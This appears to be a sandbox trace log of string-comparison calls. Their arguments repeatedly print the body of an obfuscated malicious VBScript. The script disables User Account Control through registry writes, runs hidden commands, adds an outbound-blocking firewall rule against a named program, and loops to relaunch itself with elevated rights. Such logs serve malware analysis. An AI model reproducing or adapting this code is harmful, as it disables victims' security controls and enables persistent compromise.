bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.335] wcsncmp (_String1="DSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.335] wcsncmp (_String1="SDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.335] wcsncmp (_String1="DYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.335] wcsncmp (_String1="YEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 